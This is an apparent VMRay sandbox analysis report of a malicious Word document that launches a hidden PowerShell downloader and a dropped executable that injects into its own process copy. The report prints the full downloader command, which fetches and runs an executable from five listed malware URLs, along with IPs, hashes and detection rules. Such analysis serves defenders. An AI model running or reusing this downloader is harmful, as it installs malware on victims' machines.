VMRay Analyzer Report for Sample #1964137 VMRay Analyzer 2.1.0 Process 1 2420 winword.exe 1172 winword.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\hJrD1KOKY DS8lUjv\Desktop\ c:\program files (x86)\microsoft office\root\office16\winword.exe Child_Of Process 2 2708 powershell.exe 2420 powershell.exe powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} C:\Users\hJrD1KOKY DS8lUjv\Desktop\ c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Child_Of Created Created Created Created Created Created Created Created Created Created Created Deleted Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Process 3 2976 8162.exe 2708 8162.exe "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe" C:\Users\hJrD1KOKY DS8lUjv\Desktop\ c:\users\hjrd1k~1\appdata\local\temp\8162.exe Child_Of Created Created Created Created Created Process 4 2996 8162.exe 2976 8162.exe "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe" C:\Users\hJrD1KOKY DS8lUjv\Desktop\ c:\users\hjrd1k~1\appdata\local\temp\8162.exe Created Created Created Created File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File conout$ File windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\help.format.ps1xml windows\syswow64\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\microsoft.net\framework\v2.0.50727\config\machine.config windows\microsoft.net\framework\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config config File users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe c:\ c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe exe Mutex <transform_binlog_src.engine.transformer.helper.StringValue object at 0x7f1a9740fbd0> WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE WinRegistryKey Environment HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE File System Paging File File Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe exe File STD_ERROR_HANDLE File Users\HJRD1K~1\AppData\Local\Temp\8162.exe Users\HJRD1K~1\AppData\Local\Temp\8162.exe C:\ C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe exe Analyzed Sample #1964137 Malware Artifacts 1964137 Sample-ID: #1964137 Job-ID: #10166575 This sample was analyzed by VMRay Analyzer 2.1.0 on a Windows 7 system 100 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #1964137 Submission-ID: #2791464 C:\Users\hJrD1KOKY DS8lUjv\Desktop\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc doc MD5 36ca9cea3648ef3da53f4b84fe9f6120 SHA1 10448125e344fb33a3a8ac10b2295abe02dc01b9 SHA256 dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78 Opened_By Metadata of Analysis for Job-ID #10166575 Timeout False x86 64-bit win7_64_sp1-mso2016 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 189.125 This is a property collection for additional information of VMRay analysis VMRay Analyzer Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve "carbeyondstore.com". Perform DNS request Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve "www.carbeyondstore.com". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe". Create process Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve "pxpgraphics.com". Perform DNS request Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Process VTI rule match with VTI rule score 4/5 vmray_read_from_remote_process "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" reads from "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe". Read from memory of an other process File System VTI rule match with VTI rule score 4/5 vmray_handle_with_malicious_files File "c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe" is a known malicious file. Handle with malicious files Injection VTI rule match with VTI rule score 5/5 vmray_modify_memory_system "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" modifies memory of "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" Write into memory of another process Injection VTI rule match with VTI rule score 5/5 vmray_modify_control_flow_system "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" alters context of "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" Modify control flow of another process Network VTI rule match with VTI rule score 3/5 vmray_tcp_out_connection Outgoing TCP connection to host "72.52.246.64:80". Connect to remote host Network VTI rule match with VTI rule score 3/5 vmray_tcp_out_connection Outgoing TCP connection to host "69.65.3.206:80". Connect to remote host PE VTI rule match with VTI rule score 2/5 vmray_drop_pe_file Drop file "c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe". Drop PE file PE VTI rule match with VTI rule score 3/5 vmray_execute_dropped_pe_file Execute dropped file "c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe". Execute dropped PE file VBA Macro VTI rule match with VTI rule score 1/5 vmray_execute_macro_on_ws_event Execute macro on "Activate Workbook" event. Execute macro on specific worksheet event VBA Macro VTI rule match with VTI rule score 2/5 vmray_execute_application Shell WkBDLdsmW, IDI5UPj Execute application